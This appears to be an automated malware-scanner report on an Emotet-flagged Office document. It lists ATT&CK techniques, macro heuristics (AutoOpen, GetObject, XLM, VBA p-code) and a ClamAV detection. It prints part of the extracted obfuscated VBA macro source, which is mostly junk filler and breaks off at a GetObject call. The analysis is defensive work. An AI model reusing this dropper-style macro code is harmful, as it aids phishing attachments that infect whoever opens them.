Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains multiple indicators of malicious macro activity, including legacy WordBasic, Excel 4.0, and VBA macros. The presence of an 'AutoOpen' macro and a 'GetObject' call strongly suggests the execution of a malicious payload. ClamAV detection confirms this, identifying it as Emotet, a known downloader family. The VBA script, though heavily obfuscated, likely facilitates the download and execution of a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6863640-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6863640-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium) [OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70870 bytes |

SHA-256: 40b62b6f01f9deaf2d6f4009f5a7617f7ea8d38f619d92116b53b899214adc29
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "r5088_7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "r5_5_4_"
Function f_8_4_8()
l9887__2 = 395930977 - 162273643
l__8569_ = 549886844 + z_666_
Select Case j_24592
Case 85569512
j83_44 = Chr(990470479 * Tan(Q3_34_9))
A593__2 = m7_4489
Case 860199597
z0368534 = q6017100
X_79469 = U966_9__
Case 944143160
o76__5__ = 770592123
u6_61392 = E54371_6
End Select
I_5060_ = 103165098 - 50704701
Y4__135 = 620447581 + u965__
Select Case a_475_04
Case 951851429
l___6_3 = Chr(546306573 * Tan(i057643_))
k968_21 = P_3_29
Case 113131833
A5_69__3 = z77592_2
w5_475 = r3_426_
Case 994320986
z79931 = 968139181
Z9_478__ = c_5_86_
End Select
a3_738 = 638078003 - 497717956
B19_6__ = 260706457 + q284_4_
Select Case w_4523_
Case 994594767
l__6_64 = Chr(476391997 * Tan(u77895))
n0__822 = l798___6
Case 638472092
d_8__277 = k__4428_
Q2981771 = F_602_32
Case 45242158
i0110_5 = 603591016
Y73674 = N96_89_6
End Select
n90_22 = 908423777 - 867521863
G41_13 = 777345696 + o107__
Select Case S45361
Case 92182694
j207_48 = Chr(876181962 * Tan(V97_85))
H22__3_ = r103_17
Case 549829229
h__39587 = W__89__7
Z8490_ = Y8_4_5
Case 263538960
w767_50 = 184894078
K813_0 = G037_67
End Select
w80_97_2 = 380250506 - 427890945
Y_1__75 = 129018425 + D21681
Select Case Y894_38
Case 909597525
o_1__9_2 = Chr(714320498 * Tan(O9___7))
L_______ = r7_185_2
Case 100858227
f75553_ = G__23_
O1__86_7 = C91_65
Case 378394410
T87__1_ = 612904051
p_94__2 = C27____
End Select
l2620__ = 194144116 - 766458756
U__17_ = 984186627 + S___67
Select Case z39549
Case 299691798
k435__80 = Chr(477951625 * Tan(Q_01072_))
j3__484 = O87050
Case 364164325
u34__4_ = f9_8536
X8044_ = U_36550
Case 624673673
J_68_3 = 50904838
O_34449 = p9_887
End Select
w0__1__8 = 62983398 - 820772068
N436_046 = 829433327 + W_81_70_
Select Case P__25_
Case 210596863
z209123 = Chr(782932700 * Tan(U22__7))
k_15_39 = Z50_11
Case 276277601
l47_003 = L32_965
Z948_2_ = q662__5
Case 764778586
o45238 = 399407905
k04889 = R356113
End Select
End Function
Function P5_588__(G371_95_, G567__)
On Error Resume Next
L67774 = 20924601 - 68414285
i0448_9_ = 190493219 + X153199
Select Case C06__8_
Case 674654049
z9__1_ = Chr(816953688 * Tan(H__860_))
P79637 = P8411_
Case 441899605
t92553 = o652_1
q61787 = B84162
Case 967071346
G_34__5 = 247258934
B6_581_ = W9_63_4
End Select
q12_7_ = 31648660 - 439811119
S5_6_7 = 803478431 + w70326_
Select Case W50383
Case 889442197
Z26_99 = Chr(12514590 * Tan(j_186_))
r3__68_ = N82_07
Case 252904538
j2__13 = P12___
Q_9428 = d6844_
Case 517776381
D396_2_ = 233896711
o_2509 = l9_327_
End Select
P_8_078_ = 354880179 - 12368725
V__8_34 = 71153362 + E_8185
Select Case J02_570
Case 661255125
n72___4_ = Chr(324601484 * Tan(h_811_))
i_3___3 = a5_2765
Case 240140830
u8_91_ = v8_4__5
d06___96 = D364__7
Case 850791853
Q315440_ = 239893920
q68_9_53 = M17568
End Select
Set l32__44 = GetObject((b15858_
... (truncated)